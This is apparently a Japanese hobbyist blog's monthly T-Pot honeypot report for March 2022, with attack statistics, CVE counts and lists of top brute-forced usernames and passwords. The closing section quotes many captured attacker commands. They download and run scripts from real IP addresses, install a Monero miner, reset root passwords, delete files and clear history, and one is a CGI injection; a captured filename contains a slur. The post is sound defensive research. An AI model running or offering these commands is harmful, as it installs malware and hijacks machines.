Midnight Monologues

日々勉強したことを書いてきます

ハニーポット運用(月次報告:2022年3月)

3月のイベント

1.PicoCTF 参加

火, 15 3月 2022, 17:00 UTC — 火, 29 3月 2022, 20:00 UTC で開催された picoCTF 2022に参加した 基礎的な問題が多く学びなおしのいい機会になった。

2.セキュリティ関連書籍の購入

サイバーセキュリティプログラミング 第2版 - Pythonで学ぶハッカーの思考 を購入した。
プログラミングは全くできないのでPythonPowerShellは何とかものにしたい。プログラミング環境の構築から基礎編と実践編の内容がつまっており、充実した内容だった。
www.oreilly.co.jp

セキュリティ関連の書籍はたくさんあるが個人的には以下もおすすめ。(内容が古いが...) www.coronasha.co.jp www.coronasha.co.jp

5月にでる予定のホワイトハッカーの教科書 も楽しみである。 www.c-r.com

T-Potにて1か月運用した結果を記載する。

今月のCommitsログ

・今月は無し。

前提条件

運用日時:2022年3月1日-2022年3月31日
運用期間:31日

結果

①各ハニーポットで検知したAttack件数
  • T-Potを構成する各ハニーポットへの攻撃件数の一覧を以下に記載する。
No ハニーポット 件数 先月比
1 Cowrie 1,566,262 152,034
2 Honeytrap 761,798 ▲98,630
3 Heralding 687,591 ▲39,206
4 Dionaea 380,862 65,201
5 Rdpy 67,774 ▲55,673
6 Ciscoasa 18,432 16,446
7 Adbhoney 16,847 632
8 Mailoney 15,315 5,425
9 Tanner 4,881 ▲493
10 ConPot 2,068 207
11 CitrixHoneypot 2,019 236
12 ElasticPot 871 37
13 Medpot 209 ▲118
14 Dicompot 170 99
15 Honeysap 13 ▲24
  • Result
    • 特記事項無し

②攻撃元の国名と件数(Top 20)
No 攻撃元の国名 件数 先月順位
1 Russia 661,956 2(↑)
2 Netherlands 513,743 1(↓)
3 China 483,012 3(→)
4 United States 464,431 4(→)
5 Japan 156,251 10(↑)
6 India 92,381 9(↑)
7 Singapore 77,766 8(↑)
8 Vietnam 75,335 11(↑)
9 Spain 61,237 圏外(↑)
10 Brazil 56,841 12(↑)
11 Germany 51,019 15(↑)
12 Hong Kong 48,957 圏外(↑)
13 United Kingdom 47,281 20(↑)
14 Indonesia 46,537 17(↑)
15 Mexico 39,649 圏外(↑)
16 South Korea 35,838 14(↓)
17 Sweden 26,952 19(↑)
18 Latvia 25,974 16(↓)
19 Monaco 23,177 圏外(↑)
20 Panama 22,957 7(↓)
  • Result
    • ロシアが1位に返り咲いた。戦争の影響もあるのだろうか?

③検知したCVEの脆弱性と件数
  • Suricata(オープンIPS)にて検知した各攻撃の脆弱性の内容を以下に記載する。
No CVE ID Count
1 CVE-2020-11899 1,022,080
2 CVE-2019-12263 CVE-2019-12261 CVE-2019-12260 CVE-2019-12255 229
3 CVE-2019-0708 CVE-2019-0708 CVE-2019-0708 18
4 CVE-2020-11910 16
  • Result
    • 先月から変更なし

④よく攻撃されるユーザ名
  • ユーザ名でよく攻撃されるキーワード(Top 50)で記載する。
No ユーザ名 件数
1 root 128,995
2 sa 24,988
3 user 6,706
4 admin 6,043
5 nproc 5,892
6 test 2,057
7 (empty) 1,731
8 postgres 1,638
9 22 1,284
10 ubuntu 1,201
11 oracle 888
12 git 775
13 !root 642
14 2Wire 639
15 support 609
16 testuser 582
17 ftpuser 573
18 www 530
19 guest 413
20 dev 399
21 mysql 385
22 adm 358
23 deploy 351
24 ansible 342
25 server 335
26 666666 330
27 unknown 327
28 debug 323
29 0 322
30 blank 321
31 $ALOC$ 317
32 anonymous 305
33 ftp 298
34 user1 273
35 info@mailrelay.local 263
36 web 262
37 nagios 256
38 minecraft 255
39 system 253
40 hadoop 247
41 tomcat 242
42 zabbix 239
43 test1 235
44 administrator 216
45 demo 210
46 jenkins 204
47 Admin 201
48 username 196
49 mc 187
50 www-data 184
  • Result
    • 特記事項無し

⑤よく攻撃されるパスワード
  • パスワードでよく攻撃されるキーワード(Top 50)を以下に記載する。
No パスワード 件数
1 admin 17,851
2 123456 8,143
3 nproc 5,892
4 password 3,187
5 123 3,161
6 (empty) 3,096
7 1 2,901
8 12345 1,842
9 1234 1,613
10 user 1,491
11 root 1,304
12 12345678 1,268
13 blank 960
14 test 921
15 0 775
16 123456789 710
17 1qaz2wsx 626
18 1q2w3e4r 562
19 qwerty 549
20 111111 546
21 123123 490
22 666666 454
23 Password 431
24 1234567890 419
25 support 409
26 1234567 398
27 ubnt 397
28 abc123 394
29 1qaz@WSX 387
30 pass 375
31 alpine 368
32 master 363
33 test123 361
34 00000000 359
35 backup 355
36 123qwe 346
37 unknown 326
38 hi3518 311
39 !ishtar 309
40 Passw0rd 298
41 p@ssw0rd 293
42 synnet 290
43 admin123 284
44 P@ssw0rd 283
45 !QAZ2wsx 281
46 testuser 268
47 password123 263
48 12 261
49 q1w2e3r4 241
50 system 238
  • Result
    • 特記事項無し

⑥今月のマスオさんとZmap
  • massscanの観測結果は以下の通り。

  • Zmapの観測結果は以下の通り。

  • Result

    • 特記事項は無し。

最後に

  • shファイルとexeファイル関連の問い合わせは以下の通り。
◆shファイルに関するアクセス
"http://142.93.34.32/cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http:/106.246.224.219/russia.sh;sh${IFS}/tmp/russia.sh"

"curl -s -L https://raw.githubusercontent.com/C3Pool/xmrig_setup/master/setup_c3pool_miner.sh | bash -s 4ANkemPGmjeLPgLfyYupu2B8Hed2dy8i6XYF7ehqRsSfbvZM2Pz7bDeaZXVQAs533a7MUnhB6pUREVDj2LgWj1AQSGo2HRj; wget https://raw.githubusercontent.com/C3Pool/xmrig_setup/master/setup_c3pool_miner.sh; sh setup_c3pool_miner.sh 4ANkemPGmjeLPgLfyYupu2B8Hed2dy8i6XYF7ehqRsSfbvZM2Pz7bDeaZXVQAs533a7MUnhB6pUREVDj2LgWj1AQSGo2HRj; echo -e \"xox0\\nxox0\" | passwd",
"curl -s -L https://raw.githubusercontent.com/C3Pool/xmrig_setup/master/setup_c3pool_miner.sh | bash -s 4ANkemPGmjeLPgLfyYupu2B8Hed2dy8i6XYF7ehqRsSfbvZM2Pz7bDeaZXVQAs533a7MUnhB6pUREVDj2LgWj1AQSGo2HRj; wget https://raw.githubusercontent.com/C3Pool/xmrig_setup/master/setup_c3pool_miner.sh; sh setup_c3pool_miner.sh 4ANkemPGmjeLPgLfyYupu2B8Hed2dy8i6XYF7ehqRsSfbvZM2Pz7bDeaZXVQAs533a7MUnhB6pUREVDj2LgWj1AQSGo2HRj",
"cd /tmp; curl -s -L http://download.c3pool.org/xmrig_setup/raw/master/setup_c3pool_miner.sh | LC_ALL=en_US.UTF-8 bash -s 492cUvVMbMsKpWGoSkTSbzix9Pk2Ho6XUid9vRSFALXjfQS76gyNGjnTh6DTpPHwnBAHDztwbWUGiCfZgkbndYtAMuekPcA; wget http://179.43.175.170/putkite/quickr1n.sh; chmod 777 *; sh quickr1n.sh; echo storytime",
"cd /tmp; curl -s -L http://download.c3pool.org/xmrig_setup/raw/master/setup_c3pool_miner.sh | LC_ALL=en_US.UTF-8 bash -s 492cUvVMbMsKpWGoSkTSbzix9Pk2Ho6XUid9vRSFALXjfQS76gyNGjnTh6DTpPHwnBAHDztwbWUGiCfZgkbndYtAMuekPcA; wget http://179.43.175.170/putkite/quickr1n.sh; curl -O http://179.43.175.170/putkite/quickr1n.sh; chmod 777 *; sh quickr1n.sh; echo storytime",
"curl -s -L http://download.c3pool.org/xmrig_setup/raw/master/setup_c3pool_miner.sh | LC_ALL=en_US.UTF-8 bash -s 492cUvVMbMsKpWGoSkTSbzix9Pk2Ho6XUid9vRSFALXjfQS76gyNGjnTh6DTpPHwnBAHDztwbWUGiCfZgkbndYtAMuekPcA; lspci | grep -i --color 'vga\\|3d\\|2d'; echo root:ds234e3123g4tij24jtiu3ji23rg|chpasswd|bash",
"uname -a;lspci | grep -i --color 'vga\\|3d\\|2d';curl -s -L http://download.c3pool.org/xmrig_setup/raw/master/setup_c3pool_miner.sh | LC_ALL=en_US.UTF-8 bash -s 492cUvVMbMsKpWGoSkTSbzix9Pk2Ho6XUid9vRSFALXjfQS76gyNGjnTh6DTpPHwnBAHDztwbWUGiCfZgkbndYtAMuekPcA; echo root:d11es234e3123g4tij24jtiu3ji4rg|chpasswd|bash",

"cd /data/local/tmp/; busybox wget http://23.94.22.13/w.sh; sh w.sh; curl http://23.94.22.13/c.sh; sh c.sh",
"cd /data/local/tmp/; busybox wget http://194.31.98.248/w.sh; sh w.sh; curl http://194.31.98.248/c.sh; sh c.sh",
"cd /data/local/tmp/; busybox wget http://176.32.34.23/w.sh; sh w.sh; curl http://176.32.34.23/c.sh -o c.sh; sh c.sh",
"cd /data/local/tmp/; rm -rf w.sh; rm -rf c.sh; busybox wget http://192.3.251.253/w.sh; sh w.sh; curl http://192.3.251.253/c.sh; sh c.sh",
"cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://45.90.161.105/onions1337; curl -O http://45.90.161.105/onions1337; chmod 777 onions1337; sh onions1337; tftp 45.90.161.105 -c get bins.sh; chmod 777 onions1337; sh onions1337; tftp -r .sh -g 45.90.161.105; chmod 777 .sh; sh .sh; ftpget -v -u anonymous -p anonymous -P 21 45.90.161.105 .sh .sh; sh .sh; rm -rf sh onions1337 .sh .sh; rm -rf *",
"cd /data/local/tmp/; busybox wget http://37.0.11.224/w.sh; sh w.sh; curl http://37.0.11.224/c.sh; sh c.sh",
"cd /data/local/tmp/; busybox wget http://136.144.41.60/w.sh; sh w.sh; curl http://136.144.41.60/c.sh; sh c.sh",
"cd /system/bin/; rm arm*; rm busybox wget http://176.32.34.23/w.sh; sh w.sh; curl http://176.32.34.23/c.sh -o c.sh; sh c.sh",
"cd /data/local/tmp/; busybox wget http://31.210.20.111/w.sh; sh w.sh; curl http://31.210.20.111/c.sh; sh c.sh",
"cd /sdcard/Download/;busybox wget http://176.32.34.23/w.sh; sh w.sh; curl http://176.32.34.23/c.sh -o c.sh; sh c.sh",
"cd /data/local/tmp/; wget http://194.31.98.169/w.sh; sh w.sh; curl http://194.31.98.169/c.sh; sh c.sh",
"cd /data/local/tmp/; rm -rf *.sh; busybox wget http://136.144.41.169/w.sh; sh w.sh; curl http://136.144.41.169/c.sh; sh c.sh",


"cd /data/local/tmp/; wget http://2.56.56.182/adb.sh; sh adb.sh; curl http://2.56.56.182/adb.sh; sh adb.sh"
"cd /data/local/tmp/; wget http://2.56.56.182/abd.sh; sh abd.sh; curl http://2.56.56.182/abd.sh; sh abd.sh",
"cd /data/local/tmp/; wget http://2.56.56.182/abd.sh; sh abd.sh; curl http://2.56.56.182/abd.sh; sh abd.sh"


"cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://194.31.98.122/keenzeuonions; curl -O http://194.31.98.122/keenzeuonions; chmod 777 keenzeuonions; sh keenzeuonions; tftp 194.31.98.122 -c get keenzeuonions; chmod 777 bins.sh; sh keenzeuonions; tftp -r .sh -g 194.31.98.122; chmod 777 .keenzeuonions; sh .keenzeuonions; ftpget -v -u anonymous -p anonymous -P 21 194.31.98.122 .keenzeuonions .keenzeuonions; sh .keenzeuonions; rm -rf sh keenzeuonions .keenzeuonions .keenzeuonions; rm -rf *",
"cd /tmp; wget http://0.0.0.0/update.sh; busybox wget http://0.0.0.0/update.sh; chmod 777 update.sh; sh update.sh; rm -f update.sh",
"cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://31.210.20.109/76d32be0.sh; curl -O http://31.210.20.109/76d32be0.sh; chmod 777 76d32be0.sh; sh 76d32be0.sh; tftp 31.210.20.109 -c get 76d32be0.sh; chmod 777 76d32be0.sh; sh 76d32be0.sh; tftp -r 76d32be02.sh -g 31.210.20.109; chmod 777 76d32be02.sh; sh 76d32be02.sh; ftpget -v -u anonymous -p anonymous -P 21 31.210.20.109 76d32be01.sh 76d32be01.sh; sh 76d32be01.sh; rm -rf 76d32be0.sh 76d32be0.sh 76d32be02.sh 76d32be01.sh; rm -rf *",
"cd /etc/; wget http://185.245.62.231/test.sh; chmod 777 test.sh; ./test.sh;",

"wget http://0.0.0.0/update.sh",
"#!/bin/sh; PATH=$PATH:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin; wget http://182.52.51.239/scripts/23s; curl -O http://182.52.51.239/scripts/23s; chmod +x 23s; ./23s; wget http://182.52.51.239/scripts/23; curl -O http://182.52.51.239/scripts/23; chmod +x 23; ./23; rm -rf 23.sh; ",
"cd /tmp || cd /run || cd /; wget http://31.7.62.22/niggasbins.sh; chmod 777 niggasbins.sh; sh niggasbins.sh; tftp 31.7.62.22 -c get niggastftp1.sh; chmod 777 niggastftp1.sh; sh niggastftp1.sh; tftp -r niggastftp2.sh -g 31.7.62.22; chmod 777 niggastftp2.sh; sh niggastftp2.sh; rm -rf niggasbins.sh niggastftp1.sh niggastftp2.sh; rm -rf *",
"cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://31.210.20.190/ssh.sh; curl -O http://31.210.20.190/ssh.sh; chmod 777 ssh.sh; sh ssh.sh; tftp 31.210.20.190 -c get ssh.sh; chmod 777 ssh.sh; sh ssh.sh; tftp -r ssh2.sh -g 31.210.20.190; chmod 777 ssh2.sh; sh ssh2.sh; ftpget -v -u anonymous -p anonymous -P 21 31.210.20.190 ssh1.sh ssh1.sh; sh ssh1.sh; rm -rf ssh.sh ssh.sh ssh2.sh ssh1.sh; rm -rf *",
"cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://31.210.20.109/bins.sh; busybox wget http://31.210.20.109/bins.sh; tftp -r bins.sh -g 31.210.20.109; busybox tftp -r bins.sh -g bins.sh; ftpget -v -u anonymous -p anonymous -P 21 31.210.20.109 bins.sh bins.sh; busybox ftpget -v -u anonymous -p anonymous -P 21 31.210.20.109 bins.sh bins.sh; chmod 777 bins.sh; busybox chmod 777 bins.sh; sh bins.sh; rm -rf bins.sh",

"cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://31.210.20.60/SnOoPy.sh; chmod 777 *; sh SnOoPy.sh; tftp -g 31.210.20.60 -r tftp1.sh; chmod 777 *; sh tftp1.sh; rm -rf *.sh; history -c",



◆exeファイルに関するアクセス
・Port:39877に対する2019.exeファイルへのGETリクエスト
・Port:46197に対するPhoenixClient.exeファイルへのGETリクエスト
・Port:34277,39527,41797,43227,47017,47341,49539,52901,53413,55699,57705,58585,60515に対するSystemwy.exeファイルへのGETリクエスト
・Port:39809,50895に対するServer.exeファイルへのGETリクエスト